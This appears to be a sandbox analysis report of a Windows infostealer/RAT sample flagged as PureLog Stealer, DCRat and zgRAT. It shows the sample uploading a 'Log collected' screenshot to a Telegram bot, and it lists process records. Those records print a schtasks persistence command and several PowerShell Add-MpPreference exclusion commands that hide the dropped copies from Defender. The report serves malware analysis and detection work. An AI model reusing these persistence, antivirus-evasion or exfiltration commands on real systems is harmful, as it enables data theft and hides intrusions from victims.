                                                                                                                2024-11-18 08:18:16 UTC10OUTData Raw: 31 32 37 36 30 38 33 30 32 33
                                                                                                                Data Ascii: 1276083023
                                                                                                                2024-11-18 08:18:16 UTC131OUTData Raw: 0d 0a 2d 2d 65 32 31 37 31 37 37 31 2d 35 63 66 64 2d 34 62 39 36 2d 61 66 63 30 2d 30 32 32 35 38 33 38 39 66 30 33 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 63 61 70 74 69 6f 6e 0d 0a 0d 0a
                                                                                                                Data Ascii: --e2171771-5cfd-4b96-afc0-02258389f03eContent-Type: text/plain; charset=utf-8Content-Disposition: form-data; name=caption
                                                                                                                2024-11-18 08:18:16 UTC84OUTData Raw: 4c 6f 67 20 63 6f 6c 6c 65 63 74 65 64 0a 49 44 3a 20 66 65 33 63 34 62 38 33 30 35 35 30 35 36 31 34 38 61 36 37 39 34 62 39 61 37 34 63 63 66 36 61 31 36 31 39 30 32 30 38 0a 43 6f 6d 6d 65 6e 74 3a 20 0a 4c 6f 67 20 73 69 7a 65 3a 20 39 37 34 31 35
                                                                                                                Data Ascii: Log collectedID: fe3c4b83055056148a6794b9a74ccf6a16190208Comment: Log size: 97415
                                                                                                                2024-11-18 08:18:16 UTC146OUTData Raw: 0d 0a 2d 2d 65 32 31 37 31 37 37 31 2d 35 63 66 64 2d 34 62 39 36 2d 61 66 63 30 2d 30 32 32 35 38 33 38 39 66 30 33 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 70 68 6f 74 6f 3b 20 66 69 6c 65 6e 61 6d 65 3d 73 63 72 65 65 6e 73 68 6f 74 2e 70 6e 67 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 73 63 72 65 65 6e 73 68 6f 74 2e 70 6e 67 0d 0a 0d 0a
                                                                                                                Data Ascii: --e2171771-5cfd-4b96-afc0-02258389f03eContent-Disposition: form-data; name=photo; filename=screenshot.png; filename*=utf-8''screenshot.png
                                                                                                                2024-11-18 08:18:16 UTC4096OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08
                                                                                                                Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1AQa"q2
                                                                                                                2024-11-18 08:18:16 UTC4096OUTData Raw: e2 e1 f0 db ef 20 f1 1f fc 93 2d 17 fd cb 6f fd 14 6b cf 6b d3 7c 73 6a 96 1e 0c b2 b3 88 b1 8e 09 62 89 4b 1e 48 54 60 33 ef c5 79 9d 56 52 d4 a9 4d af e6 7f 92 39 73 b4 e3 5a 09 ff 00 2a fc d8 94 50 68 af 50 f1 c2 92 96 92 80 3d 12 7b 3b 8b af 86 5a 6d c5 aa ef 9e c6 45 bb 54 fe f6 c6 6c fe 84 9f c2 b6 35 3b 1b 3f 1d f8 7a da e2 ce ec c5 22 b0 96 29 07 26 37 c7 2a c3 fc f6 35 73 c1 df f2 28 e9 df ee 37 fe 84 6a 9d d7 83 51 6f 64 bd d1 75 1b 8d 26 79 4e 64 58 46 e8 d8 fa 94 38 ff 00 0a f9 25 59 29 59 be 56 9b 69 fe 8c fb 9f 62 dc 13 4b 99 34 93 5f aa 23 d0 7c 2d 71 a5 ea 93 6b 5a c6 a9 f6 cb bf 2b 60 73 c2 a2 f7 24 9f 61 fc e9 9e 1d 94 eb 7e 2f d4 f5 e8 81 fb 12 44 2c ad dc 8f f5 98 20 b1 1e d9 1f ad 2b 78 3a f6 fc 84 d6 bc 45 77 7b 6c 0e 4c 11 c6 21 56
                                                                                                                Data Ascii: -okk|sjbKHT`3yVRM9sZ*PhP={;ZmETl5;?z")&7*5s(7jQodu&yNdXF8%Y)YVibK4_#|-qkZ+`s$a~/D, +x:Ew{lL!V
                                                                                                                2024-11-18 08:18:16 UTC4096OUTData Raw: be 45 29 e4 f0 96 9c df d3 1c 33 e9 c7 5e 45 d3 f0 d8 cf b3 be b0 8a de de 29 35 24 5c 0b 75 72 6d 9c ed dc 3f 79 f5 d9 d3 fd ae d5 7a 19 04 d1 ef 52 0a e4 80 40 c6 47 ad 2f 93 11 ff 00 96 49 ff 00 7c 8a 78 00 0c 00 00 f6 af 4a 95 39 c1 fb d2 ba 3c 9a f5 a9 d4 5e ec 2c ca 9a a2 33 e9 b7 08 a3 24 af 15 5b 5a ba 9b 53 d5 75 0b ad 2a de da d6 d8 6a 42 f9 66 85 64 0f 74 e8 4e c6 7d ec 71 8c 9e 00 51 f3 1e 2b 50 80 46 0d 20 45 51 80 00 1e c2 b3 c4 60 e1 5e a4 67 3e 9f f0 3f c8 d7 0d 8f a9 86 a7 28 43 a9 4c 6a 9a 64 1a e5 d8 b7 32 9d 2e da dc 5c 69 e0 c4 f9 fb 62 bb ca a0 83 d0 06 99 d7 77 fb 22 b3 f4 cb 4b 49 ac 74 c5 bf bd 8a d6 ee c2 dd ad d9 2e a3 91 92 54 2e ee 19 4a 2b 7c d9 72 08 20 76 20 f5 c6 df 96 9f dc 5f ca 86 8d 1b ef 22 9f a8 ae 3a 79 44 29 bb c6
                                                                                                                Data Ascii: E)3^E)5$\urm?yzR@G/I|xJ9<^,3$[ZSu*jBfdtN}qQ+PF EQ`^g>?(CLjd2.\ibw"KIt.T.J+|r v _":yD)
                                                                                                                2024-11-18 08:18:16 UTC4096OUTData Raw: 71 aa f8 7a e3 ec 6c b2 0b bb 46 f2 5b 38 0d b9 0e d3 fa 8a c4 f1 26 98 7c 41 67 b5 b4 5b d8 ee 90 7e ea 6d d0 71 ec 7f 79 c8 a7 e9 3a bc 7a 7f 86 f4 48 9e 7d 3a 32 74 e8 1b 17 37 9e 53 7d c1 d0 6d 3c 71 d7 eb 5a 36 5a e4 57 97 71 c0 b7 3a 53 97 cf cb 05 f8 91 ce 01 3c 2e d1 9f ce bc c7 4a a4 1f 34 7a 1d 5e d2 9c d7 24 ba 9e 2b 71 04 96 b7 32 db cc bb 65 89 ca 3a e7 38 20 e0 8e 2a 2c 56 96 bf ff 00 23 1e a9 ff 00 5f 72 ff 00 e8 66 b3 ab ec 70 f3 73 a3 09 4b 76 97 e4 7c 1e 2a 11 85 79 c2 3b 26 d7 e2 25 14 b4 95 a9 8d c2 92 96 8a 00 4a 28 34 50 31 28 a3 14 53 00 a3 14 51 40 c4 a2 8a 28 01 28 a5 34 94 00 94 52 d2 50 30 a4 a5 a4 a0 61 49 4b 49 40 05 21 a5 a4 34 0c 28 a2 8a 00 31 49 8a 5a 43 40 c4 a2 8c 51 8a 06 18 a4 a5 c5 18 a6 02 51 4b 46 28 b8 c6 91 47 6a
                                                                                                                Data Ascii: qzlF[8&|Ag[~mqy:zH}:2t7S}m<qZ6ZWq:S<.J4z^$+q2e:8 *,V#_rfpsKv|*y;&%J(4P1(SQ@((4RP0aIKI@!4(1IZC@QQKF(Gj
                                                                                                                2024-11-18 08:18:17 UTC1491INHTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Mon, 18 Nov 2024 08:18:16 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 1102
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                {"ok":true,"result":{"message_id":83,"from":{"id":7520842495,"is_bot":true,"first_name":"shapka52bot","username":"shapka52_bot"},"chat":{"id":1276083023,"first_name":"\u043f\u0430\u043c [ \u043f\u043e\u043c\u043e\u0433\u0438 ]","username":"SCOROUMRU","type":"private"},"date":1731917896,"photo":[{"file_id":"AgACAgIAAxkDAANTZzr4SBmxO1TWIZyz0bTl3kqm8cMAAm3gMRtpBNlJ1RHpNEG2h0sBAAMCAANzAAM2BA","file_unique_id":"AQADbeAxG2kE2Ul4","file_size":1286,"width":90,"height":72},{"file_id":"AgACAgIAAxkDAANTZzr4SBmxO1TWIZyz0bTl3kqm8cMAAm3gMRtpBNlJ1RHpNEG2h0sBAAMCAANtAAM2BA","file_unique_id":"AQADbeAxG2kE2Uly","file_size":16327,"width":320,"height":256},{"file_id":"AgACAgIAAxkDAANTZzr4SBmxO1TWIZyz0bTl3kqm8cMAAm3gMRtpBNlJ1RHpNEG2h0sBAAMCAAN4AAM2BA","file_unique_id":"AQADbeAxG2kE2Ul9","file_size":68308,"width":800,"height":640},{"file_id":"AgACAgIAAxkDAANTZzr4SBmxO1TWIZyz0bTl3kqm8cMAAm3gMRtpBNlJ1RHpNEG2h0sBAAMCAAN5AAM2BA","file_unique_id":"AQADbeAxG2kE2Ul-","file_size":102895,"width":1280,"height":1024}],"caption":"Log collecte [TRUNCATED]


                                                                                                                Statistics

                                                                                                                CPU Usage

                                                                                                                Click to jump to process

                                                                                                                Memory Usage

                                                                                                                Click to jump to process

                                                                                                                High Level Behavior Distribution

                                                                                                                Click to dive into process behavior distribution

                                                                                                                Behavior

                                                                                                                Click to jump to process

                                                                                                                System Behavior

                                                                                                                General

                                                                                                                Target ID:0
                                                                                                                Start time:03:17:02
                                                                                                                Start date:18/11/2024
                                                                                                                Path:C:\Users\user\Desktop\LzmJLVB41K.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:"C:\Users\user\Desktop\LzmJLVB41K.exe"
                                                                                                                Imagebase:0x9e0000
                                                                                                                File size:1'998'336 bytes
                                                                                                                MD5 hash:2D756772BC00E5778D794C107358DDF7
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Yara matches:
                                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000000.2160562752.00000000009E2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000000.00000002.2376236746.00000000130C6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                Reputation:low
                                                                                                                Has exited:true

                                                                                                                General

                                                                                                                Target ID:4
                                                                                                                Start time:03:17:06
                                                                                                                Start date:18/11/2024
                                                                                                                Path:C:\Windows\System32\schtasks.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:schtasks.exe /create /tn "fozAQGvSmfTQIywuzSgkf" /sc MINUTE /mo 8 /tr "'C:\Recovery\fozAQGvSmfTQIywuzSgk.exe'" /rl HIGHEST /f
                                                                                                                Imagebase:0x7ff6e98c0000
                                                                                                                File size:235'008 bytes
                                                                                                                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:true

                                                                                                                General

                                                                                                                Target ID:5
                                                                                                                Start time:03:17:06
                                                                                                                Start date:18/11/2024
                                                                                                                Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4zgfavxt\4zgfavxt.cmdline"
                                                                                                                Imagebase:0x7ff684050000
                                                                                                                File size:2'759'232 bytes
                                                                                                                MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:moderate
                                                                                                                Has exited:true

                                                                                                                General

                                                                                                                Target ID:6
                                                                                                                Start time:03:17:06
                                                                                                                Start date:18/11/2024
                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:0x7ff66e660000
                                                                                                                File size:862'208 bytes
                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:true

                                                                                                                General

                                                                                                                Target ID:7
                                                                                                                Start time:03:17:06
                                                                                                                Start date:18/11/2024
                                                                                                                Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6584.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC80740084700441B098BDC166533478DB.TMP"
                                                                                                                Imagebase:0x7ff64e610000
                                                                                                                File size:52'744 bytes
                                                                                                                MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:true

                                                                                                                General

                                                                                                                Target ID:8
                                                                                                                Start time:03:17:06
                                                                                                                Start date:18/11/2024
                                                                                                                Path:C:\Recovery\fozAQGvSmfTQIywuzSgk.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:C:\Recovery\fozAQGvSmfTQIywuzSgk.exe
                                                                                                                Imagebase:0xff0000
                                                                                                                File size:1'998'336 bytes
                                                                                                                MD5 hash:2D756772BC00E5778D794C107358DDF7
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Antivirus matches:
                                                                                                                • Detection: 66%, ReversingLabs
                                                                                                                Reputation:low
                                                                                                                Has exited:true

                                                                                                                General

                                                                                                                Target ID:9
                                                                                                                Start time:03:17:06
                                                                                                                Start date:18/11/2024
                                                                                                                Path:C:\Recovery\fozAQGvSmfTQIywuzSgk.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:C:\Recovery\fozAQGvSmfTQIywuzSgk.exe
                                                                                                                Imagebase:0xdc0000
                                                                                                                File size:1'998'336 bytes
                                                                                                                MD5 hash:2D756772BC00E5778D794C107358DDF7
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:low
                                                                                                                Has exited:true

                                                                                                                General

                                                                                                                Target ID:10
                                                                                                                Start time:03:17:07
                                                                                                                Start date:18/11/2024
                                                                                                                Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\a4ouxeif\a4ouxeif.cmdline"
                                                                                                                Imagebase:0x7ff684050000
                                                                                                                File size:2'759'232 bytes
                                                                                                                MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:moderate
                                                                                                                Has exited:true

                                                                                                                General

                                                                                                                Target ID:11
                                                                                                                Start time:03:17:07
                                                                                                                Start date:18/11/2024
                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:0x7ff66e660000
                                                                                                                File size:862'208 bytes
                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:true

                                                                                                                General

                                                                                                                Target ID:12
                                                                                                                Start time:03:17:07
                                                                                                                Start date:18/11/2024
                                                                                                                Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6A18.tmp" "c:\Windows\System32\CSC7E7B7A5EED54F4581A1AD8A9D40FA45.TMP"
                                                                                                                Imagebase:0x7ff64e610000
                                                                                                                File size:52'744 bytes
                                                                                                                MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:true

                                                                                                                General

                                                                                                                Target ID:22
                                                                                                                Start time:03:17:08
                                                                                                                Start date:18/11/2024
                                                                                                                Path:C:\Recovery\ctfmon.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:C:\Recovery\ctfmon.exe
                                                                                                                Imagebase:0x4c0000
                                                                                                                File size:1'998'336 bytes
                                                                                                                MD5 hash:2D756772BC00E5778D794C107358DDF7
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Yara matches:
                                                                                                                • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Recovery\ctfmon.exe, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\ctfmon.exe, Author: Joe Security
                                                                                                                Antivirus matches:
                                                                                                                • Detection: 100%, Avira
                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                • Detection: 66%, ReversingLabs
                                                                                                                Reputation:low
                                                                                                                Has exited:true

                                                                                                                General

                                                                                                                Target ID:24
                                                                                                                Start time:03:17:08
                                                                                                                Start date:18/11/2024
                                                                                                                Path:C:\Recovery\ctfmon.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:C:\Recovery\ctfmon.exe
                                                                                                                Imagebase:0xde0000
                                                                                                                File size:1'998'336 bytes
                                                                                                                MD5 hash:2D756772BC00E5778D794C107358DDF7
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:low
                                                                                                                Has exited:true

                                                                                                                General

                                                                                                                Target ID:26
                                                                                                                Start time:03:17:09
                                                                                                                Start date:18/11/2024
                                                                                                                Path:C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:"C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exe"
                                                                                                                Imagebase:0xc40000
                                                                                                                File size:1'998'336 bytes
                                                                                                                MD5 hash:2D756772BC00E5778D794C107358DDF7
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Yara matches:
                                                                                                                • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exe, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exe, Author: Joe Security
                                                                                                                Antivirus matches:
                                                                                                                • Detection: 100%, Avira
                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                • Detection: 66%, ReversingLabs
                                                                                                                Reputation:low
                                                                                                                Has exited:true

                                                                                                                General

                                                                                                                Target ID:28
                                                                                                                Start time:03:17:09
                                                                                                                Start date:18/11/2024
                                                                                                                Path:C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:"C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exe"
                                                                                                                Imagebase:0x950000
                                                                                                                File size:1'998'336 bytes
                                                                                                                MD5 hash:2D756772BC00E5778D794C107358DDF7
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:low
                                                                                                                Has exited:true

                                                                                                                General

                                                                                                                Target ID:32
                                                                                                                Start time:03:17:11
                                                                                                                Start date:18/11/2024
                                                                                                                Path:C:\Users\user\Desktop\LzmJLVB41K.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:C:\Users\user\Desktop\LzmJLVB41K.exe
                                                                                                                Imagebase:0x9c0000
                                                                                                                File size:1'998'336 bytes
                                                                                                                MD5 hash:2D756772BC00E5778D794C107358DDF7
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:low
                                                                                                                Has exited:true

                                                                                                                General

                                                                                                                Target ID:33
                                                                                                                Start time:03:17:11
                                                                                                                Start date:18/11/2024
                                                                                                                Path:C:\Users\user\Desktop\LzmJLVB41K.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:C:\Users\user\Desktop\LzmJLVB41K.exe
                                                                                                                Imagebase:0x230000
                                                                                                                File size:1'998'336 bytes
                                                                                                                MD5 hash:2D756772BC00E5778D794C107358DDF7
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:low
                                                                                                                Has exited:true

                                                                                                                General

                                                                                                                Target ID:34
                                                                                                                Start time:03:17:13
                                                                                                                Start date:18/11/2024
                                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\fozAQGvSmfTQIywuzSgk.exe'
                                                                                                                Imagebase:0x7ff6e3d50000
                                                                                                                File size:452'608 bytes
                                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:true

                                                                                                                General

                                                                                                                Target ID:35
                                                                                                                Start time:03:17:13
                                                                                                                Start date:18/11/2024
                                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\ctfmon.exe'
                                                                                                                Imagebase:0x7ff6e3d50000
                                                                                                                File size:452'608 bytes
                                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:true

                                                                                                                General

                                                                                                                Target ID:36
                                                                                                                Start time:03:17:13
                                                                                                                Start date:18/11/2024
                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:0x7ff66e660000
                                                                                                                File size:862'208 bytes
                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                General

                                                                                                                Target ID:37
                                                                                                                Start time:03:17:13
                                                                                                                Start date:18/11/2024
                                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\autoit3\SciTE\api\fozAQGvSmfTQIywuzSgk.exe'
                                                                                                                Imagebase:0x7ff6e3d50000
                                                                                                                File size:452'608 bytes
                                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:true

                                                                                                                General

                                                                                                                Target ID:38
                                                                                                                Start time:03:17:13
                                                                                                                Start date:18/11/2024
                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:0x7ff66e660000
                                                                                                                File size:862'208 bytes
                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                General

                                                                                                                Target ID:39
                                                                                                                Start time:03:17:14
                                                                                                                Start date:18/11/2024
                                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exe'
                                                                                                                Imagebase:0x7ff6e3d50000
                                                                                                                File size:452'608 bytes
                                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:true

                                                                                                                General

                                                                                                                Target ID:40
                                                                                                                Start time:03:17:14
                                                                                                                Start date:18/11/2024
                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:0x7ff66e660000
                                                                                                                File size:862'208 bytes
                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                General

                                                                                                                Target ID:41
                                                                                                                Start time:03:17:14
                                                                                                                Start date:18/11/2024
                                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Vss\Writers\Application\fozAQGvSmfTQIywuzSgk.exe'
                                                                                                                Imagebase:0x7ff6e3d50000
                                                                                                                File size:452'608 bytes
                                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:true

                                                                                                                General

                                                                                                                Target ID:42
                                                                                                                Start time:03:17:14
                                                                                                                Start date:18/11/2024
                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:0x7ff66e660000
                                                                                                                File size:862'208 bytes
                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                General

                                                                                                                Target ID:43
                                                                                                                Start time:03:17:14
                                                                                                                Start date:18/11/2024
                                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\LzmJLVB41K.exe'
                                                                                                                Imagebase:0x7ff6e3d50000
                                                                                                                File size:452'608 bytes
                                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:true

                                                                                                                General

                                                                                                                Target ID:44
                                                                                                                Start time:03:17:14
                                                                                                                Start date:18/11/2024
                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:0x7ff66e660000
